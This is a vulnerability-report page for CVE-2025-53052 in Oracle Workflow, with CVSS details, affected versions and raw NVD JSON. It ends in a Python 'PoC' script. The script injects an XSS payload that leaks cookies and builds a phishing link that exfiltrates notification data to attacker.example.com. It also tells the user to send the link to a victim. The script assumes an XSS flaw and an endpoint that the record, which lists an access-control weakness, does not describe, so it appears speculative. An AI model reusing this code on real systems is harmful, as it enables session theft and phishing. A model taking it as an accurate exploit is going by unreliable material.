Security Vulnerability Report
CVE-2025-53052 CVSS 6.1 MEDIUM

CVE-2025-53052

Published: 2025-10-21 20:20:43
Last Modified: 2025-10-23 16:06:12

Description

Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Workflow Notification Mailer). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Workflow. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Workflow, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Workflow accessible data as well as unauthorized read access to a subset of Oracle Workflow accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:workflow:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite 12.2.3
Oracle E-Business Suite 12.2.4
Oracle E-Business Suite 12.2.5
Oracle E-Business Suite 12.2.6
Oracle E-Business Suite 12.2.7
Oracle E-Business Suite 12.2.8
Oracle E-Business Suite 12.2.9
Oracle E-Business Suite 12.2.10
Oracle E-Business Suite 12.2.11
Oracle E-Business Suite 12.2.12
Oracle E-Business Suite 12.2.13
Oracle E-Business Suite 12.2.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53052 - Oracle Workflow Notification Mailer XSS PoC
# Vulnerability: Reflected/Stored XSS in Oracle Workflow Notification Mailer
# Affected: Oracle E-Business Suite 12.2.3 - 12.2.14
import requests

TARGET_URL = "https://target-oracle-ebs.example.com/OA_HTML/OA.jsp"

# Oracle Workflow Notification Mailer endpoint
NOTIFICATION_ENDPOINT = "/OA_HTML/wf_notification_mailer.jsp"


def exploit_xss(base_url, param_name="notificationId", payload=None):
    """
    Exploit reflected XSS in Oracle Workflow Notification Mailer
    The notificationId or similar parameter is reflected without proper sanitization
    """
    if payload is None:
        # XSS payload to steal session data or perform unauthorized actions
        payload = (
            '<script>'
            'var xhr = new XMLHttpRequest();'
            'xhr.open("POST", "/OA_HTML/wf_update_data.jsp", true);'
            'xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");'
            'xhr.send("action=delete&item=" + document.cookie);'
            '</script>'
        )

    # Craft the malicious URL
    params = {param_name: payload}
    malicious_url = f"{base_url}{NOTIFICATION_ENDPOINT}"
    print(f"[*] Malicious URL: {malicious_url}")
    print(f"[*] Payload parameter: {param_name}={payload}")

    # Verify the endpoint is vulnerable
    response = requests.get(malicious_url, params=params, verify=False)
    if payload in response.text:
        print("[+] Target appears vulnerable! Payload reflected in response.")
        print("[+] Send this URL to a victim user to trigger the XSS attack.")
        return True
    else:
        print("[-] Payload not reflected. Target may not be vulnerable or WAF is in place.")
        return False


def craft_phishing_link(base_url):
    """
    Craft a phishing link to be sent to the victim
    """
    payload = "javascript:fetch('/OA_HTML/wf_notif_data?export=true',{credentials:'same-origin'}).then(r=>r.text()).then(d=>fetch('https://attacker.example.com/steal?d='+btoa(d)))"
    link = f"{base_url}{NOTIFICATION_ENDPOINT}?redirect={payload}"
    print(f"[*] Phishing link: {link}")
    return link


if __name__ == "__main__":
    exploit_xss(TARGET_URL)
    craft_phishing_link(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53052", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:43.303", "lastModified": "2025-10-23T16:06:11.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Workflow Notification Mailer). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Workflow. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Workflow, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Workflow accessible data as well as unauthorized read access to a subset of Oracle Workflow accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:workflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "B8EDFF6B-489B-48D0-8B48-B3E8F9FBCD7C"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}